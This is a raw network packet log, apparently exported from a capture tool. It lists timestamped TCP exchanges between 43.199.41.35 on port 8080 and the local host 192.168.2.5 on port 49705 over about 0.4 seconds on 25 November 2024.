                                                                                                                                                        Nov 25, 2024 11:10:22.401026011 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.401067972 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.401807070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.401856899 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.401937962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.402723074 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.402770996 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.402791977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.403564930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.403610945 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.403664112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.404541016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.404555082 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.404591084 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.405352116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.405404091 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.405461073 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.406234026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.406280041 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.406346083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.407116890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.407161951 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.407264948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.408003092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.408056974 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.408106089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.408907890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.408953905 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.409081936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.409801006 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.409847975 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.409890890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.410778999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.410794973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.410826921 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.411545038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.411602020 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.411642075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.412419081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.412467003 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.412523031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.413450956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.413463116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.413492918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.414174080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.414223909 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.414313078 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.415092945 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.415142059 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.415180922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.416003942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.416050911 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.416084051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.416840076 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.416887999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.416965008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.417787075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.417838097 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.417933941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.418662071 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.418751001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.418776989 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.419647932 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.419693947 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.419759989 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.420572042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.420625925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.420718908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.421421051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.421468973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.421473980 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.422166109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.422214985 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.422303915 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.423098087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.423141956 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.423196077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.423970938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.424026012 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.424047947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.479598045 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.527633905 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.527781963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.527842999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.528345108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.528400898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.528445959 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.528487921 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.529145002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.529162884 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.529192924 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.530035973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.530061960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.530086994 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.530920982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.530972004 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.530977964 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.531737089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.531781912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.531826973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.532615900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.532680988 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.560448885 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.560610056 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.560664892 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.560820103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.560916901 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.561003923 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.561819077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.561989069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.562036991 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.562108040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.562938929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.562973976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.562983990 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.563786030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.563862085 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.563890934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.564676046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.564717054 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.564826012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.565562963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.565614939 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.565676928 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.566468000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.566519022 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.566546917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.567322016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.567364931 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.567436934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.568212032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.568249941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.568278074 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.585006952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.585063934 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.585128069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.585557938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.585602999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.585608006 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.586355925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.586421967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.586427927 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.587198019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.587241888 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.587291002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.588057041 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.588100910 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.588177919 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.588932991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.588990927 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.589049101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.589848042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.589896917 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.589956045 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.590718985 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.590775013 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.590888977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.591618061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.591662884 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.591732025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.592494011 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.592540026 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.592550993 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.593399048 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.593446970 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.593575001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.594310999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.594355106 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.594427109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.595160961 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.595206022 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.595258951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.596050024 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.596101999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.596177101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.596956015 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.596982956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.596997976 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.597822905 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.597866058 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.597939968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.598742962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.598783970 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.598854065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.599612951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.599682093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.599699974 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.600477934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.600526094 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.600621939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.601356030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.601408958 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.601449966 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.602236986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.602288008 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.602356911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.603137970 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.603182077 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.603195906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.604017973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.604064941 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.604121923 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.604927063 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.604976892 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.605016947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.605798006 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.605815887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.605845928 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.606714010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.606769085 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.606818914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.607573032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.607626915 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.607656002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.608454943 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.608505964 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.608556032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.609361887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.609409094 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.609452009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.610282898 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.610332966 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.610398054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.611136913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.611181974 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.611243010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.612031937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.612081051 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.612153053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.612895966 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.612932920 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.612941980 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.613764048 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.613814116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.613879919 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.614713907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.614727020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.614764929 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.615530014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.615581036 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.615705967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.616420984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.616471052 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.719935894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.720062971 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.720123053 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.720347881 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.720464945 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.720509052 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.721251011 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.721371889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.721415043 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.722135067 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.722287893 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.722332001 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.723056078 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.723068953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.723119020 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.723923922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.723975897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.724020004 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.724813938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.724904060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.724955082 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.752851009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.752918959 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.752994061 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.753037930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.753221035 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.753266096 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.753333092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.754132986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.754180908 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.754228115 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.755029917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.755079031 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.755129099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.755923986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.755973101 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.756016016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.756798029 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.756894112 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.756917000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.757694960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.757750034 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.757805109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.758580923 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.758626938 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.758687019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.759459972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.759505033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.759552002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.760348082 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.760430098 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.760441065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.777169943 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.777226925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.777297974 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.777614117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.777657986 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.777734041 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.778525114 CET80804970543.199.41.35192.168.2.5
